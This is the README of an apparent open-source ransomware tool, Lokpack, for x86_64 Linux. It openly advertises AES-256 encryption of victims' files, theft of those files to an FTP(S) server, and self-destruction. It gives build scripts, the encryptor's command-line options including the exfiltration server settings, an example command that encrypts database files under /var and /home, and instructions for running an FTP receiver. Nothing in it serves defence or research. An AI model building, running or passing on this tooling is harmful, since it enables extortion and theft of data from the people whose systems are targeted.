Lokpack is a free (as in freedom) and open source ransomware tool targeting x86_64 Linux systems, written in C.
- Build static encryption and decrypiton tools
- Steal files using a FTP(S) server
- Specify custom target paths
- Uncrackable AES-256 encryption
- Multi-threaded (a.k.a. fast)
Required libraries/tools:
- A (x86_64) Linux system
- gcc and other build tools
- curl (and headers)
- openssl (and headers)
To generate static builds, you will need static libraries of curl and openssl, if your distro does not package these, you can build them yourself or use the automated build scripts:
./scripts/openssl.sh
./scripts/curl.sh
Note that automated script for curl does not support SSL connections.
After building the static libraries, use the build script to create build with a random key:
./scripts/build.sh
This should create the encryptor
and the decryptor
binares at dist/
.
After transfering encryptor
to the target system, you can specify custom options:
$ ./encryptor --help
[*] Listing available options:
--threads => Thread count for the thread pool
--paths => Paths to look for files
--exts => Valid extensions for files
--ftp-url => Address for the FTP(S) server
--ftp-user => FTP(S) username
--ftp-pwd => FTP(S) password
--no-ftp => Disable stealing files with FTP(S)
--destruct => Self destruct the program
--debug => Enable debug output
For example to encrypt .sql
and .db
files located at /var
and /home
without FTP using 100 threads:
./encryptor --threads=100 --paths=/var,/home --exts=sql,db --no-ftp
If you want to encrypt all files with all extensions, set --exts
to ALL
.
For an actual FTP(S) setup you should install a FTP daemon such as vsftpd
or bftpd
. But for testing you can
use pyftpdlib
:
# username and password are 'anonymous'
# which is default for the encryptor
python3 -m pyftpdlib -w
# -w for write access